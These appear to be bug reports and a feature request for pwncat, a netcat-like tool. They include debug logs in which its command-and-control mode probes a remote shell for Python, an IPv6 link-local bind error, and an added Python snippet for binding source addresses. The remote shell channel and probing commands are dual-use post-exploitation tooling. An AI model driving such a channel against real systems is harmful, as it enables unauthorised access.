2022-08-09 13:44:43,871 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.052430 sec in 3/5 rounds
2022-08-09 13:44:44,222 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.403409 sec in 4/5 rounds
2022-08-09 13:44:44,573 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.754423 sec in 5/5 rounds
[...]
[PWNCAT CnC] Probing for: /opt/python3.8/bin/python3.8
2022-08-09 13:49:21,820 DEBUG [MainThread] 1898:send(): Trying to send 82 bytes to 192.168.10.254:5555
2022-08-09 13:49:21,820 TRACE [MainThread] 1904:send(): Trying to send: b'test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo\n'
2022-08-09 13:49:21,820 DEBUG [MainThread] 1921:send(): Sent 82 bytes to 192.168.10.254:5555 (0 bytes remaining)
2022-08-09 13:49:22,171 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.350498 sec in 1/5 rounds
2022-08-09 13:49:22,522 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 0.701218 sec in 2/5 rounds
2022-08-09 13:49:22,872 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.051955 sec in 3/5 rounds
2022-08-09 13:49:23,223 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.402681 sec in 4/5 rounds
2022-08-09 13:49:23,574 TRACE [MainThread] 4481:send_recv(): Timeout: Receive timed out after 1.753400 sec in 5/5 rounds
[PWNCAT CnC] No Python has been found. Aborting and handing over to current shell.
2022-08-09 13:49:23,575 TRACE [RECV] 4014:run_action(): [RECV] Producer Start
2022-08-09 13:49:23,575 TRACE [STDIN] 4014:run_action(): [STDIN] Producer Start
2022-08-09 13:51:35,682 DEBUG [RECV] 2032:receive(): Received 19 bytes from 192.168.10.254:5555
2022-08-09 13:51:35,682 TRACE [RECV] 2038:receive(): Received: b'string from client\n'
2022-08-09 13:51:35,682 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'string from client\n'
string from client
STRING FROM SERVER
2022-08-09 13:51:49,136 DEBUG [STDIN] 3435:producer(): Received 19 bytes from STDIN
2022-08-09 13:51:49,136 TRACE [STDIN] 3436:producer(): Received: b'STRING FROM SERVER\n'
2022-08-09 13:51:49,136 TRACE [STDIN] 4016:run_action(): [STDIN] Producer received: b'STRING FROM SERVER\n'
2022-08-09 13:51:49,136 DEBUG [STDIN] 1898:send(): Trying to send 19 bytes to 192.168.10.254:5555
2022-08-09 13:51:49,136 TRACE [STDIN] 1904:send(): Trying to send: b'STRING FROM SERVER\n'
2022-08-09 13:51:49,136 DEBUG [STDIN] 1921:send(): Sent 19 bytes to 192.168.10.254:5555 (0 bytes remaining)

Client:

./pwncat --source-port 5555 --source-addr 192.168.10.254 192.168.10.184 9999 -vvvvv
2022-08-09 13:44:25,266 DEBUG [MainThread] 3396:__init__(): STDOUT isatty: True
2022-08-09 13:44:25,266 DEBUG [MainThread] 3397:__init__(): STDIN  isatty: True
2022-08-09 13:44:25,266 DEBUG [MainThread] 3398:__init__(): STDIN  posix:  False (posix)
2022-08-09 13:44:25,266 DEBUG [MainThread] 1465:create_socket(): Creating (family 10/IPv6, TCP) socket
2022-08-09 13:44:25,266 DEBUG [MainThread] 1485:create_socket(): Disabling IPv4 support on IPv6 socket
2022-08-09 13:44:25,266 DEBUG [MainThread] 1465:create_socket(): Creating (family 2/IPv4, TCP) socket
2022-08-09 13:44:25,267 DEBUG [MainThread] 1414:gethostbyname(): Resolving IPv4 name not required, changing to IPv6: ::ffff:192.168.10.184
2022-08-09 13:44:25,267 DEBUG [MainThread] 1418:gethostbyname(): Resolving IPv4 host not required, already an IP: 192.168.10.184
2022-08-09 13:44:25,267 DEBUG [MainThread] 1636:connect(): Binding specifically to 192.168.10.254:5555
2022-08-09 13:44:25,267 DEBUG [MainThread] 1517:bind(): Binding (family 10/IPv6, TCP) socket to 192.168.10.254:5555
2022-08-09 13:44:25,267 DEBUG [MainThread] 1636:connect(): Binding specifically to 192.168.10.254:5555
2022-08-09 13:44:25,267 DEBUG [MainThread] 1517:bind(): Binding (family 2/IPv4, TCP) socket to 192.168.10.254:5555
2022-08-09 13:44:25,267 DEBUG [MainThread] 1641:connect(): Connecting to 192.168.10.184:9999 (family 2/IPv4, TCP)
2022-08-09 13:44:25,268 DEBUG [MainThread] 1690:connect(): Connected from 192.168.10.254:5555
2022-08-09 13:44:25,269 INFO [MainThread] 1695:connect(): Connected to 192.168.10.184:9999 (family 2/IPv4, TCP)
2022-08-09 13:44:25,269 TRACE [RECV] 4014:run_action(): [RECV] Producer Start
2022-08-09 13:44:25,269 TRACE [STDIN] 4014:run_action(): [STDIN] Producer Start
2022-08-09 13:44:27,023 DEBUG [RECV] 2032:receive(): Received 15 bytes from 192.168.10.184:9999
2022-08-09 13:44:27,023 TRACE [RECV] 2038:receive(): Received: b'echo "__pwn__"\n'
2022-08-09 13:44:27,023 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'echo "__pwn__"\n'
echo "__pwn__"
2022-08-09 13:44:28,777 DEBUG [RECV] 2032:receive(): Received 26 bytes from 192.168.10.184:9999
2022-08-09 13:44:28,777 TRACE [RECV] 2038:receive(): Received: b'which python3 2>/dev/null\n'
2022-08-09 13:44:28,777 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python3 2>/dev/null\n'
which python3 2>/dev/null
2022-08-09 13:44:30,532 DEBUG [RECV] 2032:receive(): Received 25 bytes from 192.168.10.184:9999
2022-08-09 13:44:30,532 TRACE [RECV] 2038:receive(): Received: b'which python 2>/dev/null\n'
2022-08-09 13:44:30,532 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python 2>/dev/null\n'
which python 2>/dev/null
2022-08-09 13:44:32,288 DEBUG [RECV] 2032:receive(): Received 26 bytes from 192.168.10.184:9999
2022-08-09 13:44:32,288 TRACE [RECV] 2038:receive(): Received: b'which python2 2>/dev/null\n'
2022-08-09 13:44:32,289 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python2 2>/dev/null\n'
which python2 2>/dev/null
2022-08-09 13:44:34,044 DEBUG [RECV] 2032:receive(): Received 28 bytes from 192.168.10.184:9999
2022-08-09 13:44:34,044 TRACE [RECV] 2038:receive(): Received: b'which python2.7 2>/dev/null\n'
2022-08-09 13:44:34,044 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python2.7 2>/dev/null\n'
which python2.7 2>/dev/null
2022-08-09 13:44:35,800 DEBUG [RECV] 2032:receive(): Received 28 bytes from 192.168.10.184:9999
2022-08-09 13:44:35,800 TRACE [RECV] 2038:receive(): Received: b'which python3.5 2>/dev/null\n'
2022-08-09 13:44:35,800 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python3.5 2>/dev/null\n'
which python3.5 2>/dev/null
2022-08-09 13:44:37,556 DEBUG [RECV] 2032:receive(): Received 28 bytes from 192.168.10.184:9999
2022-08-09 13:44:37,556 TRACE [RECV] 2038:receive(): Received: b'which python3.6 2>/dev/null\n'
2022-08-09 13:44:37,556 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python3.6 2>/dev/null\n'
which python3.6 2>/dev/null
2022-08-09 13:44:39,311 DEBUG [RECV] 2032:receive(): Received 28 bytes from 192.168.10.184:9999
2022-08-09 13:44:39,312 TRACE [RECV] 2038:receive(): Received: b'which python3.7 2>/dev/null\n'
2022-08-09 13:44:39,312 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python3.7 2>/dev/null\n'
which python3.7 2>/dev/null
2022-08-09 13:44:41,067 DEBUG [RECV] 2032:receive(): Received 28 bytes from 192.168.10.184:9999
2022-08-09 13:44:41,067 TRACE [RECV] 2038:receive(): Received: b'which python3.8 2>/dev/null\n'
2022-08-09 13:44:41,068 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'which python3.8 2>/dev/null\n'
which python3.8 2>/dev/null
2022-08-09 13:44:42,823 DEBUG [RECV] 2032:receive(): Received 58 bytes from 192.168.10.184:9999
2022-08-09 13:44:42,823 TRACE [RECV] 2038:receive(): Received: b'test -f /usr/bin/python3 && echo /usr/bin/python3 || echo\n'
2022-08-09 13:44:42,823 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'test -f /usr/bin/python3 && echo /usr/bin/python3 || echo\n'
test -f /usr/bin/python3 && echo /usr/bin/python3 || echo
2022-08-09 13:44:44,579 DEBUG [RECV] 2032:receive(): Received 56 bytes from 192.168.10.184:9999
2022-08-09 13:44:44,579 TRACE [RECV] 2038:receive(): Received: b'test -f /usr/bin/python && echo /usr/bin/python || echo\n'
2022-08-09 13:44:44,579 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'test -f /usr/bin/python && echo /usr/bin/python || echo\n'
[...]
2022-08-09 13:49:21,826 DEBUG [RECV] 2032:receive(): Received 82 bytes from 192.168.10.184:9999
2022-08-09 13:49:21,826 TRACE [RECV] 2038:receive(): Received: b'test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo\n'
2022-08-09 13:49:21,826 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo\n'
test -f /opt/python3.8/bin/python3.8 && echo /opt/python3.8/bin/python3.8 || echo
string from client
2022-08-09 13:51:35,685 DEBUG [STDIN] 3435:producer(): Received 19 bytes from STDIN
2022-08-09 13:51:35,685 TRACE [STDIN] 3436:producer(): Received: b'string from client\n'
2022-08-09 13:51:35,686 TRACE [STDIN] 4016:run_action(): [STDIN] Producer received: b'string from client\n'
2022-08-09 13:51:35,686 DEBUG [STDIN] 1898:send(): Trying to send 19 bytes to 192.168.10.184:9999
2022-08-09 13:51:35,686 TRACE [STDIN] 1904:send(): Trying to send: b'string from client\n'
2022-08-09 13:51:35,686 DEBUG [STDIN] 1921:send(): Sent 19 bytes to 192.168.10.184:9999 (0 bytes remaining)
2022-08-09 13:51:49,141 DEBUG [RECV] 2032:receive(): Received 19 bytes from 192.168.10.184:9999
2022-08-09 13:51:49,142 TRACE [RECV] 2038:receive(): Received: b'STRING FROM SERVER\n'
2022-08-09 13:51:49,142 TRACE [RECV] 4016:run_action(): [RECV] Producer received: b'STRING FROM SERVER\n'
STRING FROM SERVER

After iterating through all combinations, pwncat dumps to the existing shell (which still echoes content back and forth) because it cannot find Python; however, Python is definitely installed and this bug persists across Linux distros. I'm pretty sure there's something wrong with the client returning remote_command output because the only packets from client to server had null payloads.

IPv6 link-local address causes "Invalid argument" / "Bind Error"

ISSUE TYPE

  • Bug Report

OS / ENVIRONMENT

  1. Operating system: Ubuntu 20.04
  2. Python version: 3.8.2
  3. Command with highest logging output level is attached.

Here is the terminal output (address is masked for privacy).

$ pwncat -V
pwncat: Version 0.1.0 (https://github.com/cytopia/pwncat) by cytopia

$ pwncat -vvvv fe80::xxxx:xxxx:xxxx:xxxx%eth0 7777
2020-08-16 13:52:30,945 DEBUG [MainThread] 3391:__init__(): STDOUT isatty: True
2020-08-16 13:52:30,945 DEBUG [MainThread] 3392:__init__(): STDIN  isatty: True
2020-08-16 13:52:30,945 DEBUG [MainThread] 3393:__init__(): STDIN  posix:  False (posix)
2020-08-16 13:52:30,945 DEBUG [MainThread] 1465:create_socket(): Creating (family 10/IPv6, TCP) socket
2020-08-16 13:52:30,945 DEBUG [MainThread] 1485:create_socket(): Disabling IPv4 support on IPv6 socket
2020-08-16 13:52:30,945 DEBUG [MainThread] 1465:create_socket(): Creating (family 2/IPv4, TCP) socket
2020-08-16 13:52:30,946 DEBUG [MainThread] 1429:gethostbyname(): Resolved IPv6 host: fe80::xxxx:xxxx:xxxx:xxxx
2020-08-16 13:52:30,946 DEBUG [MainThread] 1435:gethostbyname(): Resolving IPv4 host: fe80::xxxx:xxxx:xxxx:xxxx%eth0 failed: [Errno -9] Address family for hostname not supported
2020-08-16 13:52:30,946 DEBUG [MainThread] 1641:connect(): Connecting to fe80::xxxx:xxxx:xxxx:xxxx:7777 (family 10/IPv6, TCP)
2020-08-16 13:52:30,946 ERROR [MainThread] 2122:run_client(): Connecting to fe80::xxxx:xxxx:xxxx:xxxx:7777 (family 10/IPv6, TCP) failed: [Errno 22] Invalid argument
2020-08-16 13:52:30,946 INFO [MainThread] 2976:__client_reconnect_to_server(): Reconnect count is used up. Shutting down.

$ pwncat -vvvv -l fe80::xxxx:xxxx:xxxx:xxxx%eth0 7777
2020-08-16 13:52:35,838 DEBUG [MainThread] 3391:__init__(): STDOUT isatty: True
2020-08-16 13:52:35,838 DEBUG [MainThread] 3392:__init__(): STDIN  isatty: True
2020-08-16 13:52:35,838 DEBUG [MainThread] 3393:__init__(): STDIN  posix:  False (posix)
2020-08-16 13:52:35,838 DEBUG [MainThread] 1465:create_socket(): Creating (family 10/IPv6, TCP) socket
2020-08-16 13:52:35,838 DEBUG [MainThread] 1485:create_socket(): Disabling IPv4 support on IPv6 socket
2020-08-16 13:52:35,838 DEBUG [MainThread] 1465:create_socket(): Creating (family 2/IPv4, TCP) socket
2020-08-16 13:52:35,839 DEBUG [MainThread] 1429:gethostbyname(): Resolved IPv6 host: fe80::xxxx:xxxx:xxxx:xxxx
2020-08-16 13:52:35,839 DEBUG [MainThread] 1435:gethostbyname(): Resolving IPv4 host: fe80::xxxx:xxxx:xxxx:xxxx%eth0 failed: [Errno -9] Address family for hostname not supported
2020-08-16 13:52:35,839 DEBUG [MainThread] 2187:run_server(): Removing (family 2/IPv4) due to: Resolving IPv4 host: fe80::xxxx:xxxx:xxxx:xxxx%eth0 failed: [Errno -9] Address family for hostname not supported
2020-08-16 13:52:35,839 DEBUG [MainThread] 1517:bind(): Binding (family 10/IPv6, TCP) socket to fe80::xxxx:xxxx:xxxx:xxxx:7777
2020-08-16 13:52:35,839 DEBUG [MainThread] 2207:run_server(): Removing (family 10/IPv6) due to: Binding (family 10/IPv6, TCP) socket to fe80::xxxx:xxxx:xxxx:xxxx:7777 failed: [Errno 22] Invalid argument
2020-08-16 13:52:35,839 ERROR [MainThread] 2216:run_server(): Bind Error: Could not bind any socket
2020-08-16 13:52:35,839 INFO [MainThread] 3034:__server_rebind(): Rebind count is used up. Shutting down.

STEPS TO REPRODUCE

Same as above log.

EXPECTED BEHAVIOUR

Works the same as with an IPv6 global unicast address.

ACTUAL BEHAVIOUR

Invalid argument / Bind Error

Be able to specify source address and port for clients

ISSUE TYPE

  • Feature request

SUMMARY

By default, when a client connects to a server, the operating system chooses the source port and address. As it is also possible to specify that yourself, pwncat should have it too to be more flexible.

Goal

Be able to specify source address and port for clients for more feature-parity with netcat.
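How a client can keep the link-local zone (the `%eth0` that the log in the IPv6 issue above shows being dropped before `connect()` fails with `Invalid argument`) and bind a chosen source address and port as this feature request asks, as an added Python example that is not pwncat's own code. `make_sockaddr`, `connect_tcp` and the Linux AF_INET6 4-tuple semantics are my assumptions.

```python
"""Build an AF_INET6 sockaddr that preserves the link-local scope ("%eth0").

Added illustration, not pwncat's code. Assumes Linux semantics: a link-local
(fe80::/10) address is only usable with a zone index, carried as the 4th
element of the AF_INET6 sockaddr tuple (addr, port, flowinfo, scope_id).
"""
import ipaddress
import socket
from typing import Optional, Tuple


def make_sockaddr(host: str, port: int) -> Tuple[str, int, int, int]:
    """Return (addr, port, flowinfo, scope_id) for a numeric IPv6 host.

    Accepts "fe80::1%eth0" (interface name) or "fe80::1%3" (numeric zone
    index). Without a "%zone" a link-local address would get scope_id 0,
    which the kernel rejects with EINVAL (errno 22), so refuse it up front.
    """
    addr, sep, zone = host.partition("%")
    ip = ipaddress.IPv6Address(addr)  # raises ValueError if not an IPv6 literal
    scope_id = 0
    if sep:
        # Zone may be a numeric index or an interface name (if_nametoindex
        # needs the interface to exist on this host).
        scope_id = int(zone) if zone.isdigit() else socket.if_nametoindex(zone)
    if ip.is_link_local and scope_id == 0:
        raise ValueError(f"link-local address {addr} needs a zone, e.g. {addr}%eth0")
    return (str(ip), port, 0, scope_id)


def connect_tcp(host: str, port: int,
                source: Optional[Tuple[str, int]] = None) -> socket.socket:
    """Connect to an IPv6 target, optionally binding a chosen source
    address and port first (what netcat's -s / -p options provide)."""
    target = make_sockaddr(host, port)
    sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
    sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 1)
    if source is not None:
        src_host, src_port = source
        # Binding before connect() fixes the local side of the connection;
        # a source port of 0 lets the OS pick one, as it would by default.
        sock.bind(make_sockaddr(src_host, src_port))
    sock.connect(target)  # 4-tuple keeps the zone the kernel needs
    return sock
```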
